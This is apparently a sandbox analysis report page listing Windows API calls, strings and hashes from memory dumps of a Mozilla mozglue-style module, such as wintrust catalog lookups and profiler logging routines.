                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                        • String ID: [I %d/%d] WriteProfileToJSONWriter
                                                                                                                                                        • API String ID: 2491745604-3904374701
                                                                                                                                                        • Opcode ID: 9d7177f3be67d5576696ed3ac700e84db0fd0ceb8e5816855af4e43387a3a98a
                                                                                                                                                        • Instruction ID: 6c75d6d08c94e445ebb0d6905bc3254ea7261b88688328db86dfa6020b12a39d
                                                                                                                                                        • Opcode Fuzzy Hash: 9d7177f3be67d5576696ed3ac700e84db0fd0ceb8e5816855af4e43387a3a98a
                                                                                                                                                        • Instruction Fuzzy Hash: 35312A716043009FD70CDF68944136AFFE6EFDA248F00896DE8995B341EB79C945C7A2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0B0222
                                                                                                                                                        • moz_xmalloc.MOZGLUE(0000000C), ref: 6B0B0231
                                                                                                                                                          • Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0B028B
                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6B0B02F7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 2782572024-2766056989
                                                                                                                                                        • Opcode ID: 5f479c40525286458d7b8688e5667caab0e0a8b0b032bed2d05fd915a72b7688
                                                                                                                                                        • Instruction ID: 04bce77298a5cc40dddb3088a36311ea0bc936d2165ec4006e7cc6d6ad101567
                                                                                                                                                        • Opcode Fuzzy Hash: 5f479c40525286458d7b8688e5667caab0e0a8b0b032bed2d05fd915a72b7688
                                                                                                                                                        • Instruction Fuzzy Hash: A4319DB2A046108FEB68CF68C980B1ABBF6FF44714B14856DD95ADB340E736ED05CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
                                                                                                                                                          • Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BE047
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0BE04F
                                                                                                                                                          • Part of subcall function 6B0B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6B0B94EE
                                                                                                                                                          • Part of subcall function 6B0B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6B0B9508
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0BE09C
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0BE0B0
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] profiler_get_profile, xrefs: 6B0BE057
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                        • String ID: [I %d/%d] profiler_get_profile
                                                                                                                                                        • API String ID: 1832963901-4276087706
                                                                                                                                                        • Opcode ID: 9b9f85e8d0ce29fd8f3dfd01d67816ea7dc924736530023a67dcdd4f0f0078dd
                                                                                                                                                        • Instruction ID: f4605a38dc564525d79e45c2d74bc371d95a273ff9963da294b7696249066502
                                                                                                                                                        • Opcode Fuzzy Hash: 9b9f85e8d0ce29fd8f3dfd01d67816ea7dc924736530023a67dcdd4f0f0078dd
                                                                                                                                                        • Instruction Fuzzy Hash: B1218374A101089FDF08DF74D859BAEBFA9EF45208F144864ED0A97341DB3AD945CBA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • SearchPathW.KERNEL32(?,6B09BFBD,.dll,00000000,00000000,00000000,6B09BFBD), ref: 6B0DABBD
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000001), ref: 6B0DABD8
                                                                                                                                                          • Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6B0DABEB
                                                                                                                                                        • SearchPathW.KERNEL32(?,?,.dll,00000001,?,00000000), ref: 6B0DAC03
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PathSearch$mallocmemsetmoz_xmalloc
                                                                                                                                                        • String ID: .dll
                                                                                                                                                        • API String ID: 3063185715-2738580789
                                                                                                                                                        • Opcode ID: f4d87439fb7d8e2e8680945719d81a0780281e3ff6450e9a3ee3e10edbeedc65
                                                                                                                                                        • Instruction ID: e9eadb22b2f47edf5bfd205f71b0db246351819de27d7094bc09ed1dd884e9b9
                                                                                                                                                        • Opcode Fuzzy Hash: f4d87439fb7d8e2e8680945719d81a0780281e3ff6450e9a3ee3e10edbeedc65
                                                                                                                                                        • Instruction Fuzzy Hash: 9301D2B2A0020A6FEB144E74DC45BBFBEAEEB81250F150035FD09D3200E67A9D454BB1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(ole32,?,6B07EE51,?), ref: 6B07F0B2
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6B07F0C2
                                                                                                                                                        Strings
                                                                                                                                                        • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6B07F0DC
                                                                                                                                                        • ole32, xrefs: 6B07F0AD
                                                                                                                                                        • Could not find CoTaskMemFree, xrefs: 6B07F0E3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                                                                                                        • API String ID: 2574300362-1578401391
                                                                                                                                                        • Opcode ID: 997ca51d5833786b65d2b7b517922da641262c4a331e61f5b2f9a84c4b860854
                                                                                                                                                        • Instruction ID: e59b4d124b43fe92b47db76ab51fd1e640526fce76513b5e71dd1c38f0dd4f54
                                                                                                                                                        • Opcode Fuzzy Hash: 997ca51d5833786b65d2b7b517922da641262c4a331e61f5b2f9a84c4b860854
                                                                                                                                                        • Instruction Fuzzy Hash: 12E0DFB0744341ABAF2C7AF6A818B2A7FDEAF52605300803DED06C1700EE38E010CAB5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(user32.dll,?,?,6B08434E), ref: 6B0D73EB
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 6B0D7404
                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,6B08434E), ref: 6B0D7413
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                        • String ID: SetProcessDpiAwarenessContext$user32.dll
                                                                                                                                                        • API String ID: 145871493-397433131
                                                                                                                                                        • Opcode ID: 256de321d3e99f6132ed8bf7f7a9f11a17a709ccabf32032b8e3797924115650
                                                                                                                                                        • Instruction ID: f86315574d7d6ba02bae4d666403a44745fd1a15d10c707b53cbbd2eb430aea3
                                                                                                                                                        • Opcode Fuzzy Hash: 256de321d3e99f6132ed8bf7f7a9f11a17a709ccabf32032b8e3797924115650
                                                                                                                                                        • Instruction Fuzzy Hash: 6AE04F702013019FE7141FA4E918706BFEDEF05341F008829EE8AC3740E7B5D4008B60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6B087297), ref: 6B0B0128
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6B0B0147
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6B087297), ref: 6B0B015E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                        • String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
                                                                                                                                                        • API String ID: 145871493-1536241729
                                                                                                                                                        • Opcode ID: 587eba28b02bf3482b308c8b7a8c25abe0b881f0e5e536a119601621bdfebe85
                                                                                                                                                        • Instruction ID: 0dd2f9f5255b7c06b0054725e8e2bbec2b4cb42f9f5ae1831abaa1e4589fda9f
                                                                                                                                                        • Opcode Fuzzy Hash: 587eba28b02bf3482b308c8b7a8c25abe0b881f0e5e536a119601621bdfebe85
                                                                                                                                                        • Instruction Fuzzy Hash: 02E09A74649205AFEF085F69E9087167FEDA757341F004426AE05C6350E779C001CF50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6B087308), ref: 6B0B0178
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6B0B0197
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6B087308), ref: 6B0B01AE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                        • String ID: CryptCATCatalogInfoFromContext$wintrust.dll
                                                                                                                                                        • API String ID: 145871493-3354427110
                                                                                                                                                        • Opcode ID: 83aa6f0cedba591120206e5394cbcfea5e22b96bd1451569b3aadf94093ddb64
                                                                                                                                                        • Instruction ID: fcc3d2d757768150e055050565a22da7d1ab6eb6b86932b4f78e321c062c5ec9
                                                                                                                                                        • Opcode Fuzzy Hash: 83aa6f0cedba591120206e5394cbcfea5e22b96bd1451569b3aadf94093ddb64
                                                                                                                                                        • Instruction Fuzzy Hash: 2BE092747862059FEF485F65EA48B057FEEB706245F044466EE9582290EBB9C082CA34
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6B087266), ref: 6B0B01C8
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6B0B01E7
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6B087266), ref: 6B0B01FE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                        • String ID: CryptCATAdminReleaseContext$wintrust.dll
                                                                                                                                                        • API String ID: 145871493-1489773717
                                                                                                                                                        • Opcode ID: b09549c2349854d97aec0152ef089d2b82a002c0d35a82a6212bde9c974aef17
                                                                                                                                                        • Instruction ID: 03c2e4ce1e85bc8d52b5b7b75a9211a7bc3950b9bae7bc053ac9a40eb30ad4e1
                                                                                                                                                        • Opcode Fuzzy Hash: b09549c2349854d97aec0152ef089d2b82a002c0d35a82a6212bde9c974aef17
                                                                                                                                                        • Instruction Fuzzy Hash: AAE09A746853469FEF085F65E90870A7FEDAB07341F404425EE05C5290EBB9C002DF20
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6B087204), ref: 6B0B0088
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6B0B00A7
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6B087204), ref: 6B0B00BE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                        • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                                                                                                        • API String ID: 145871493-3385133079
                                                                                                                                                        • Opcode ID: 40f9a6d4de9272f9364e41c9b3ceacb9bb42b8ce6bf588f56ecd28ae9c255a3e
                                                                                                                                                        • Instruction ID: 4fd8a2b86a8ec99317148d36aff96f5892c7ae165a312c0b60f4c5e4ecd7a1af
                                                                                                                                                        • Opcode Fuzzy Hash: 40f9a6d4de9272f9364e41c9b3ceacb9bb42b8ce6bf588f56ecd28ae9c255a3e
                                                                                                                                                        • Instruction Fuzzy Hash: 7EE092756593059BEF08AF66E9187057FEEA70B381F508026AD15C2390EBBAC006DF21
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6B087235), ref: 6B0B00D8
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6B0B00F7
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6B087235), ref: 6B0B010E
                                                                                                                                                        Strings
                                                                                                                                                        • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6B0B00F1
                                                                                                                                                        • wintrust.dll, xrefs: 6B0B00D3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                        • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                                                                                                        • API String ID: 145871493-2559046807
                                                                                                                                                        • Opcode ID: 70996774d1d5441dbf76c045e8be403d04e2d072648e408c5096543f32543a6d
                                                                                                                                                        • Instruction ID: d4244ff50d4d3d071aa071a6a04cead71e523be5b0577565999e01cdbf1eaf5e
                                                                                                                                                        • Opcode Fuzzy Hash: 70996774d1d5441dbf76c045e8be403d04e2d072648e408c5096543f32543a6d
                                                                                                                                                        • Instruction Fuzzy Hash: 20E0927474A3059BEF189F65AA497357FEEE706A41F448429AD4A82650EBB9C082CA20
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6B0877F6), ref: 6B0DC248
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6B0DC267
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6B0877F6), ref: 6B0DC27C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                        • String ID: CryptCATAdminAcquireContext$wintrust.dll
                                                                                                                                                        • API String ID: 145871493-3357690181
                                                                                                                                                        • Opcode ID: 99a051c759955ece35912fb290190041b69d4582961effe5fb46c92fdbe9cb6a
                                                                                                                                                        • Instruction ID: 35eb5e07948b23f59620280be3744ee316d48dc55f88dba980d18b4c3667440b
                                                                                                                                                        • Opcode Fuzzy Hash: 99a051c759955ece35912fb290190041b69d4582961effe5fb46c92fdbe9cb6a
                                                                                                                                                        • Instruction Fuzzy Hash: 78E0B6746413019BEF086F66E8087157FEDEB0B384F504066ED05C2240E7B8C042DF64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6B0877C5), ref: 6B0DC298
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6B0DC2B7
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6B0877C5), ref: 6B0DC2CC
                                                                                                                                                        Strings
                                                                                                                                                        • CryptCATAdminCalcHashFromFileHandle, xrefs: 6B0DC2B1
                                                                                                                                                        • wintrust.dll, xrefs: 6B0DC293
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                        • String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
                                                                                                                                                        • API String ID: 145871493-1423897460
                                                                                                                                                        • Opcode ID: a3aabb800ed05c9d1197742f090f3f7eb56c65a4f08bd519aae22e3ae181e24c
                                                                                                                                                        • Instruction ID: e46e982bc604be7d6d5720f293c40724718452675492835f6051c009b93767b3
                                                                                                                                                        • Opcode Fuzzy Hash: a3aabb800ed05c9d1197742f090f3f7eb56c65a4f08bd519aae22e3ae181e24c
                                                                                                                                                        • Instruction Fuzzy Hash: 5DE0B674742306AFEF046F69E9087167FEDFB06304F440026AD0A86750E7BDC002CB50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(kernelbase.dll,?,6B0805BC), ref: 6B0DBAB8
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6B0DBAD7
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6B0805BC), ref: 6B0DBAEC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                        • String ID: VirtualAlloc2$kernelbase.dll
                                                                                                                                                        • API String ID: 145871493-1188699709
                                                                                                                                                        • Opcode ID: 53ad387ea0c337a5922d5366ce98c118a12b629ff1d9f040c59d094f51a0be83
                                                                                                                                                        • Instruction ID: 3ab417bed38f661a56312401ae3e3f8029c0b8a1728893bce15404541a3c2397
